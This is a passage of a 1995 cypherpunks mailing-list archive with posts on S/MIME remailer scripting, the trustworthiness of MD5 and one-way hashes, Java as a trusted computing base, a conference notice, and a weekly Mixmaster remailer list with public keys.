rm incoming-message
rm /tmp/decrypted.$$

 The option would also be a very low-cruft-output -- there
would be none of that PGP v2.6.2 stuff that PGP sends out. Just the
decrypted output and if the message cant be decrypted, nothing gets
output. (Maybe a -q option for that..)

 I think the smime should be easily plugged into premail as
well, but I don't know premail to know what would be necessary for
that. I suspect Raph would have some input on that matter.


>
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?
>                 --Bob Baldwin
>


 --
sameer      Voice:   510-601-9777
Community ConneXion    FAX:  510-601-9734
The Internet Privacy Provider   Dialin:  510-658-6376
http://www.c2.org (or login as "guest")   sameer@c2.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:28 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093123.1151.341076@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Dr. Frederick B. Cohen[SMTP:fc@all.net]
Sent:  Tuesday, October 24, 1995 4:01 PM
To:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by   
IETF]


...
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove   
that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5   
is
> secure, ergo we cannot (completely) trust it. [Please correct if this   
is a
> substantially incorrect inference.]
>
> One of the standard responses is "it's the best we can do". When people   
said
> this about PGP, FBC made some (IMHO) interesting comments about the
> encryption he uses in various circumstances. Perhaps he would like to   
share
> his personal choices of one-way hash functions with us.

Since you asked:

It's a really complex issue.

 As a fundamental, we know that any "one-way" hash function must
be many-to-one, which means that, in practice, there are always large
numbers (2^large numbers) of sources for any given hash.  This means
that forgeries are always possible.

 I know of no way to prove that (and no convincing argument that
the workload for creating) a forgery is hard for any "one-way" hash
function.  This seems to mean that we are always betting on faith about
these things.

 The techniques that seem to be reasonably good are; modular
exponentiation in a modulus that's the product of two appropriate primes
(a.k.a.  RSA but throw out the private key when you create it); certain
classes of non-linear feedback shift registers of high degree; and some
general class of mixing algorithms like MD5.

 The RSA-type hash is slow, and some great mathematician may show
up tomorrow and lay waste to the whole thing.  Non-linear feedback shift
registers have the advantage that we don't know how to factor
high-degree equations, so we don't know how to make simple closed form
solutions to find output values.  MD5-type systems are good because they
combine diffusion and confusion and avoid a lot of the more well-known
flaws as far as we know.

 None of these reasons are particularly convincing, so I think we
have to take a risk management approach.  So the ultimate question here
is, how much are we willing to bet that nobody can break one of these in
the intended application over a particular time frame.

 I trust the RSA and NLFSR systems, if reasonably well
implemented, for a single short time-frame low-valued transaction.  For
example, pick a good pseudo-random number and create an RSA one-way hash
of 512 bits (the random number issue is of course another whole area),
encrypt the first bloack, Xor with the second block, encrypt the result,
etc.  till done, then Xor again with the original random seed, send the
file and the hash along with the one-way key, and get a confirmation
back within a few days.

 I don't trust any of them as a basis for running a major part of
an economy over open communications links, and I especially don't trust
them when combined or when the security of one depends on another.  To
run an economy, I think you need more redundancy, more personnel
security, more stop-loss capabilities, physically secure devices,
independent checks and balances, etc.

 Someone on this list mentioned that the banking system trusts
the RSA and MD5, etc.  but this seems to me to be a mischaracterization.
They trust these systems to an extent, but they have key change
requirements, regular audits, physical security, relatively secured
communications lines (when compared to the Internet), strong procedural
controls (most of the time), and other such protections, and they still
get hammered for a few million now and then.

 This is probably enough for now, since the list is probably
getting tired of my posts and I have made the major points.

 --
 -> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:25 PDT
To: sbryan@maroon.tc.umn.edu (Steve Bryan)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093123.1151.341077@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Steve Bryan[SMTP:sbryan@maroon.tc.umn.edu]
Sent:  Tuesday, October 24, 1995 3:08 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by   
IETF]


Dr. Frederick B. Cohen writes:

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
>allow the known plaintext attack that gets the RSA private key used to
>authenticate messages.  As far as I am aware (and I may not be aware of
>everything) there is no reference work to support this assumption.  If
>the assumption is wrong, then the whole SSL can fall to a selected
>plaintext attack launchable (presumably) through those general purpose
>Java aplets we have heard so much about.

With a mailing list this large and diverse one can reasonably assume a   
range
 of interests and expertise. What I don't understand is your agnostic   
stance
 on something as apparently basic as MD5. If computer security is your
 purported area of expertise why have you not reached any firm   
conclusions
 about it? I understand that rigid conclusions are unsafe (eg they'll   
never
 prove Fermat's last theorem) but it is not like every question is   
equally
 open. Do you have a realistic attack on MD5 or is this sophomoric   
claptrap?
 How do you propose to generate messages with specific message digests?
 Assuming you could somehow, how do you proceed to use that information   
to
 your advantage? So let's say I have a message digest and I'm retrieving   
the
 allegedly corresponding message which you have the opportunity to alter   
to
 your heart's content. How would you proceed, even in principle, to   
defeat
 MD5? I realize I might be assuming too much when I posit that I have the
 true MD5 for the message but my understanding is that you feel that MD5
 might be vulnerable. I've given you all the known plaintexts. Is there a
 next step?

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:38 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: RE: (fwd) Chaum vs. Stein
Message-ID: <1995Oct25.093123.1151.341079@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Robert Hettinga[SMTP:rah@shipwright.com]
Sent:  Tuesday, October 24, 1995 3:52 PM
To:  cypherpunks
Subject:  (fwd) Chaum vs. Stein



 --- begin forwarded text

To: www-buyinfo <www-buyinfo.allegra..att..com@mail.checkfree.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 24 Oct 95 13:38:40 EDT
Subject: Chaum vs. Stein

Wanted to save my 'me too' until a time I could piggy-back it onto   
something a
little more pithy (and I DO mean 'little'). Robert, thanks for taking the   
time
and energy for filtering cpx and forwarding the best. David, thanks for
providing the forum. Now that  _that's_  out of the way ...

I've just been handed a registration booklet for The Bank Administration
Institute's Retail Delivery '95 conference December 2-6 in Atlanta.   
Notable
speakers include The Bill, MasterCard CEO Eugene Lockhart, Visa   
International
CEO Edmund Jensen, Intuit CEO Scott Cook and Checkfree CEO Pete Kight   
(among
others).

Featured on page 6 is a "Fireside Chat: The Financial Marketplace of the
Future" moderated by Lou Dobbs... How warm and fuzzy. What really caught   
my
eye
was a panel discussion on Internet Security scheduled for that Wednesday.   
The
panelists are David Chaum, Cybercash CEO William Melton, and FV CEO Lee   
Stein.

If anyone goes, tell us all how it went!

Kicker -  the postal frank is of the "non-profit organization" variety.
BIA's site is at http://www.bai.org

 --- end forwarded text


 -----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf   
<<<<<








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:46 PDT
To: todd@lgt.com (Todd Glassey)
Subject: RE: Sun speaks out - but not to the cyph
Message-ID: <1995Oct25.093124.1151.341080@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Todd Glassey[SMTP:todd@lgt.com]
Sent:  Tuesday, October 24, 1995 12:52 PM
To:  David A Wagner
Cc:  cypherpunks
Subject:  Re: Sun speaks out - but not to the cypherpunks


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02110101acaf51651ef9@[204.156.156.4]>,
>Todd Glassey <todd@lgt.com> wrote:
>[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
>> Pardon the flame but I really have just about heard enough of this   
BS...
>[...]
>> >> The area where we can (must) build trust is the computing base.
>> >> Traditionally, this has been the OS, but in the case of java, it is
>> >> the java interpreter (such as netscape 2.0 and hotjava).  The   
browser
>> >>  is now the TCB (trusted computer base) for all practical   
purposes...
>> >
>> >Read: The Java interpreter is supposed to be a TCB.
>[...]
>> >Who here truly believes that the implementations of Java meet the
>> >requirements of a TCB?
>[...]
>> Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava.
>[ ... flame deleted ... ]
>
>
>No, here I think Dr. Cohen's comments are right on the mark.
>
>The Java interpreter *is* supposed to be a trusted computing base.
>Do we have any reason to believe that this trust is well-placed?
>
>(If you don't agree, go through the Orange Book evaluation criteria,
>and pay special attention to the assurance sections...)
>- ---
>[This message has been signed by an auto-signing service.  A valid   
signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
>NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
>=UZH0
>-----END PGP SIGNATURE-----


Sorry abopt the above flame-war I caused.

My point was almost benign in and of itself. Yes, the Java concept is
sound, No, the currently available implementation has some real
architectural considerations that must be addressed in order that we can
build a stable and secure platform atop it.

My real issue is that there is so much time spent on this list knocking   
the
individual spokes that make up this wheel we call Electronic Commerce,   
that
it is more and more costly to filter out the technology from the   
background
noise. Still because of the value of that technology, I and others are
forced to spend precious hours reviewing all that comes across our desks.

Bluntly being an active member of several Security and Payment Mechanism
working groups I view some 150+ pieces of email a day and sometimes get
frustrated by the amount of noise, or the roar in the background, about
what are to the largest percentage of us, meaningless dribble... Still
there is the occaisional golden nugget that makes it all worth while..

Again My apologies to have stirred up this mess. I will retreat under my
desktop from the mele' that seems to be unending.

Todd




Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


 -----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
 -----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 25 Oct 95 07:35:36 PDT
To: cypherpunks@toad.com
Subject: CNN Interactive Internet privacy interview
Message-ID: <9510251435.AA07028@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Probably triggered by the USA Today article.

	<URL:http://www.cnn.com/TECH/9510/computer_privacy/index.html>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:36:34 PDT
To: remailer-operators@c2.org (Remailer Operators)
Subject: RE: Weekly Type-II Remailer List
Message-ID: <1995Oct25.093453.1151.341094@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  John A. Perry[SMTP:perry@alpha.jpunix.com]
Sent:  Tuesday, October 24, 1995 12:32 PM
To:  Mixmaster Mailing List; Remailer Operators; cypherpunks
Subject:  Weekly Type-II Remailer List

Sender: owner-cypherpunks@toad.com
Precedence: bulk

 -----BEGIN PGP SIGNED MESSAGE-----

ED: You might notice that gondolin has retired. (Sigh!)

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33   
2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222   
2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

 - -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

 - -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33   
2.0

 - -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

 - -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

 - -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

 - -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

 - -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222   
2.0b11

 - -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

 - -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0

 - -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

 - -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

 - -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

 - -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

 - -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

 - -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

 - -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
 - -----End Mix Key-----

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail   
welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.



 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMI0i8qghiWHnUu4JAQFyRgf8CRcpz+KPl84PGWpZGG5X0gdsjheBdV+f
Kk3RJzj48tadeeV3AGXy1u+W+S8W+BRjAqu52TGD97i38N9CemltHYn+zU+M7tNN
MY/gV7TGBqhOsCs7jOxH9XovyI59DI9rDVft6FIrHLBlSYsM73v6wApXAwEmVhXl
WgPMJotkQZOmekMvo4Z2qGJMqMpB5tgzIHqOB+i/Y1w65bG+31KqYiaudr2nGxuX
KV09GwGk4993eYIoZIQLCEBAyxI+j5/tymQEk7hc6veaZG4FkuBo5cp6OnFiexTD
